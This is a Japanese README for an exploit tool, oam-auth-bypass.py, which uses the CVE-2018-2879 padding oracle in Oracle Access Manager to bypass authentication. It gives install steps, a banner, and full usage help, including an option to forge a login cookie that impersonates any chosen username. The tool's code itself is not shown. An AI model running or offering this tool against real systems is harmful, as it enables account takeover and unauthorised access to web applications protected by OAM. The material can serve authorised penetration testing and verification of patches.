
Oracle Access Manager のパディングオラクル脆弱性 (CVE-2018-2879) のエクスプロイト
Oracle Access Manager (OAM) のパディングオラクルの脆弱性 (CVE-2018-2879) を悪用して、有効なユーザー名を使用して OAM で保護された任意の Web アプリケーションに認証バイパスを行いログインします。
このエクスプロイトは、SEC Consult によって発見された OAM パディングオラクルの脆弱性に基づいており、OAM v12.2.1.3.0 でテストされました。
https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/
pip install urllib3 paddingoracle requests
# python oam-auth-bypass.py -h
$$$$$$\ $$$$$$\ $$\ $$\ $$$$$$\ $$\ $$\ $$$$$$$\
$$ __$$\ $$ __$$\ $$$\ $$$ | $$ __$$\ $$ | $$ | $$ __$$\
$$ / $$ |$$ / $$ |$$$$\ $$$$ | $$ / $$ |$$\ $$\ $$$$$$\ $$$$$$$\ $$ | $$ |$$\ $$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\
$$ | $$ |$$$$$$$$ |$$\$$\$$ $$ | $$$$$$$$ |$$ | $$ |\_$$ _| $$ __$$\ $$$$$$$\ |$$ | $$ |$$ __$$\ \____$$\ $$ _____|$$ _____|
$$ | $$ |$$ __$$ |$$ \$$$ $$ | $$ __$$ |$$ | $$ | $$ | $$ | $$ | $$ __$$\ $$ | $$ |$$ / $$ | $$$$$$$ |\$$$$$$\ \$$$$$$\
$$ | $$ |$$ | $$ |$$ |\$ /$$ | $$ | $$ |$$ | $$ | $$ |$$\ $$ | $$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ __$$ | \____$$\ \____$$\
$$$$$$ |$$ | $$ |$$ | \_/ $$ | $$ | $$ |\$$$$$$ | \$$$$ |$$ | $$ |$$\ $$$$$$$ |\$$$$$$$ |$$$$$$$ |\$$$$$$$ |$$$$$$$ |$$$$$$$ |
\______/ \__| \__|\__| \__| \__| \__| \______/ \____/ \__| \__|\__| \_______/ \____$$ |$$ ____/ \_______|\_______/ \_______/
$$\ $$ |$$ |
\$$$$$$ |$$ |
\______/ \__|
OAM 認証バイパスエクスプロイト
開発者: Ayman ElSherif
usage: oam-auth-bypass.py [-h] [-a <agentid>] [-p <prefix>] [-e <Clear-text>]
[-d <Cipher-text>] [-i <username>] [-z <authid>]
[-c <cookie>] [-v]
url
positional arguments:
url OAM (Oracle WebGate) で保護されたリソースの URL
optional arguments:
-h, --help このヘルプメッセージを表示して終了
-a <agentid>, --agentid <agentid>
使用する Oracle Web Gateway のエージェント ID
-p <prefix>, --prefix <prefix>
プレフィックス: 最後のブロックがスペースで始まる有効な base64 エンコードされた encquery 値
-e <Clear-text>, --encrypt <Clear-text>
暗号化する平文の値
-d <Cipher-text>, --decrypt <Cipher-text>
復号する暗号文の値
-i <username>, --impersonate <username>
ログインクッキーを作成するユーザー名
-z <authid>, --authid <authid>
認証 ID
-c <cookie>, --cookie <cookie>
有効な OAM 認証クッキー
-v, --verbose 詳細出力